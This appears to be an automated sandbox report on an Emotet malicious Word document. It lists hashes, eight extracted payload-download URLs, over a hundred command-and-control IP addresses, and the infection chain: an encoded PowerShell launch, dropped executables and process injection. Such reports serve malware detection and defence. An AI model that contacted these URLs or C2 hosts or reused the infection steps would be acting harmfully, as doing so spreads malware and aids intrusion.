Analysis

max time kernel: 85s
max time network: 86s
platform: windows7_x64
resource: win7
submitted: 27-10-2020 23:16

Static task: static1
Behavioral task: behavioral1
Sample: emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc
Resource: win7
General

Target: emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc
Size: 191KB
MD5: 5380ac7e6bb601430d526324efcb3be1
SHA1: 3a2e6649282590cf90ad5438966c96d412ac11ec
SHA256: 6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495
SHA512: 246ccb0a5b1abc6a248d4e34affeb0607d4df20f6d39a16a498da56d4125fbd778be4a2b4e6b02f0f4b3f1d494101a2c5edc227cdd969a88cca0efaf1591ffe2
Malware Config
Extracted
http://mueindustries.com/wp-admin/D/
http://biharbhumibazar.com/wp-admin/D/
http://jiehost.com/wp-admin/6ZFh6A/
http://fit.develab.mx/wp-admin/sjai4FA/
http://weeklyoutfits.com/how-much/zw2z/
http://personalizedjigsaws.com/replace_img/qG6D9T/
http://stabri-thailand.org/cgi-bin/1GKI/
http://odmova.pl/retranslate/OqLdry/
Extracted: emotet (Epoch2)
88.153.35.32:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
67.170.250.203:443
121.124.124.40:7080
103.86.49.11:8080
74.214.230.200:80
194.187.133.160:443
172.104.97.173:8080
172.91.208.86:80
200.116.145.225:443
202.134.4.216:8080
172.105.13.66:443
190.164.104.62:80
50.35.17.13:80
176.111.60.55:8080
201.241.127.190:80
66.76.12.94:8080
95.213.236.64:8080
194.4.58.192:7080
62.171.142.179:8080
79.137.83.50:443
190.108.228.27:443
120.150.218.241:443
218.147.193.146:80
176.113.52.6:443
24.178.90.49:80
123.176.25.234:80
138.68.87.218:443
194.190.67.75:80
203.153.216.189:7080
102.182.93.220:80
37.139.21.175:8080
50.91.114.38:80
154.91.33.137:443
97.82.79.83:80
75.143.247.51:80
71.15.245.148:8080
89.121.205.18:80
209.54.13.14:80
47.36.140.164:80
27.114.9.93:80
104.131.11.150:443
24.133.106.23:80
49.50.209.131:80
174.106.122.139:80
2.58.16.89:8080
157.245.99.39:8080
137.59.187.107:8080
220.245.198.194:80
61.33.119.226:443
190.29.166.0:80
62.75.141.82:80
112.185.64.233:80
61.19.246.238:443
186.70.56.94:443
37.187.72.193:8080
190.240.194.77:443
108.46.29.236:80
118.83.154.64:443
121.7.31.214:80
216.139.123.119:80
91.146.156.228:80
119.59.116.21:8080
89.216.122.92:80
190.162.215.233:80
87.106.136.232:8080
68.115.186.26:80
62.30.7.67:443
37.179.204.33:80
110.145.77.103:80
78.24.219.147:8080
185.94.252.104:443
24.230.141.169:80
49.3.224.99:8080
104.131.123.136:443
74.208.45.104:8080
115.94.207.99:443
124.41.215.226:80
142.112.10.95:20
41.185.28.84:8080
139.99.158.11:443
113.61.66.94:80
67.163.161.107:80
172.86.188.251:8080
110.142.236.207:80
120.150.60.189:80
87.106.139.101:8080
61.76.222.210:80
93.147.212.206:80
50.245.107.73:443
85.105.111.166:80
94.230.70.6:80
134.209.144.106:443
202.141.243.254:443
94.23.237.171:443
209.141.54.221:7080
187.161.206.24:80
76.175.162.101:80
168.235.67.138:7080
24.137.76.62:80
95.9.5.93:80
123.142.37.166:80
72.186.136.247:443
182.208.30.18:443
186.74.215.34:80
162.241.140.129:8080
217.20.166.178:7080
184.180.181.202:80
217.123.207.149:80
202.134.4.211:8080
72.143.73.234:443
59.125.219.109:443
24.179.13.119:80
5.39.91.110:7080
109.74.5.95:8080
46.105.131.79:8080
91.211.88.52:7080
94.200.114.161:80
173.63.222.65:80
139.162.60.124:8080
188.219.31.12:80
139.59.60.244:8080
190.12.119.180:443
78.188.106.53:443
96.245.227.43:80
Signatures

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: POwersheLL.exe
Columns: description, pid, pid_target, process, target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1668 | 2028 | POwersheLL.exe
Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
resource | yara_rule
behavioral1/memory/856-12-0x0000000001FB0000-0x0000000001FE3000-memory.dmp | emotet
behavioral1/memory/856-13-0x0000000001FF0000-0x0000000002021000-memory.dmp | emotet
behavioral1/memory/1116-17-0x0000000000580000-0x00000000005B3000-memory.dmp | emotet
behavioral1/memory/1116-18-0x0000000001E20000-0x0000000001E51000-memory.dmp | emotet
Blacklisted process makes network request (1 IoCs)
Processes: POwersheLL.exe
flow | pid | process
7 | 1668 | POwersheLL.exe
Executes dropped EXE (2 IoCs)
Processes: Ekkzsyr.exe, batmeter.exe
pid | process
856 | Ekkzsyr.exe
1116 | batmeter.exe
Drops file in System32 directory (2 IoCs)
Processes: POwersheLL.exe, Ekkzsyr.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | POwersheLL.exe
File opened for modification | C:\Windows\SysWOW64\tbs\batmeter.exe | Ekkzsyr.exe
Drops file in Windows directory (1 IoCs)
Processes: WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings
Processes: WINWORD.EXE
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Modifies registry class (280 IoCs)
Processes: WINWORD.EXE
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A797F7EE-7BAB-4855-894C-9FA2B5CABF5F}\2.0\0 | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\TypeLib\{A797F7EE-7BAB-4855-894C-9FA2B5CABF5F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} | WINWORD.EXE
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A797F7EE-7BAB-4855-894C-9FA2B5CABF5F} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes: WINWORD.EXE
pid | process
1036 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: POwersheLL.exe, batmeter.exe
pid | process
1668 | POwersheLL.exe
1668 | POwersheLL.exe
1116 | batmeter.exe
1116 | batmeter.exe
1116 | batmeter.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes: POwersheLL.exe
description | pid | process
Token: SeDebugPrivilege | 1668 | POwersheLL.exe
Suspicious use of SetWindowsHookEx (4 IoCs)
Processes: WINWORD.EXE, Ekkzsyr.exe, batmeter.exe
pid | process
1036 | WINWORD.EXE
1036 | WINWORD.EXE
856 | Ekkzsyr.exe
1116 | batmeter.exe
Suspicious use of WriteProcessMemory (4 IoCs)
Processes: Ekkzsyr.exe
description | pid | process | target process
PID 856 wrote to memory of 1116 | 856 | Ekkzsyr.exe | batmeter.exe
PID 856 wrote to memory of 1116 | 856 | Ekkzsyr.exe | batmeter.exe
PID 856 wrote to memory of 1116 | 856 | Ekkzsyr.exe | batmeter.exe
PID 856 wrote to memory of 1116 | 856 | Ekkzsyr.exe | batmeter.exe
Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495_2020-10-27__231258998145._fpx.doc"
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
Command line: POwersheLL -ENCOD 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
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
Command line: C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\tbs\batmeter.exe (child of Ekkzsyr.exe)
    Command line: "C:\Windows\SysWOW64\tbs\batmeter.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads

C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
MD5: 8d1cae4e7c6d2d234a74b39708ba1e74
SHA1: e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a
SHA256: 37ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee
SHA512: 7fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1

C:\Windows\SysWOW64\tbs\batmeter.exe
MD5: 8d1cae4e7c6d2d234a74b39708ba1e74
SHA1: e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a
SHA256: 37ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee
SHA512: 7fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1

Memory dumps (filesize)
memory/856-12-0x0000000001FB0000-0x0000000001FE3000-memory.dmp (204KB)
memory/856-13-0x0000000001FF0000-0x0000000002021000-memory.dmp (196KB)
memory/1036-1-0x0000000006210000-0x0000000006214000-memory.dmp (16KB)
memory/1036-2-0x000000000065A000-0x000000000065E000-memory.dmp (16KB)
memory/1036-3-0x000000000065A000-0x000000000065E000-memory.dmp (16KB)
memory/1036-0-0x0000000000658000-0x000000000065A000-memory.dmp (8KB)
memory/1116-18-0x0000000001E20000-0x0000000001E51000-memory.dmp (196KB)
memory/1116-15-0x0000000000000000-mapping.dmp
memory/1116-17-0x0000000000580000-0x00000000005B3000-memory.dmp (204KB)
memory/1496-19-0x000007FEF7020000-0x000007FEF729A000-memory.dmp (2.5MB)
memory/1668-5-0x0000000002530000-0x0000000002531000-memory.dmp (4KB)
memory/1668-10-0x000000001B970000-0x000000001B971000-memory.dmp (4KB)
memory/1668-9-0x000000001B8A0000-0x000000001B8A1000-memory.dmp (4KB)
memory/1668-8-0x0000000002370000-0x0000000002371000-memory.dmp (4KB)
memory/1668-7-0x0000000002410000-0x0000000002411000-memory.dmp (4KB)
memory/1668-6-0x000000001AA20000-0x000000001AA21000-memory.dmp (4KB)
memory/1668-4-0x000007FEF6160000-0x000007FEF6B4C000-memory.dmp (9.9MB)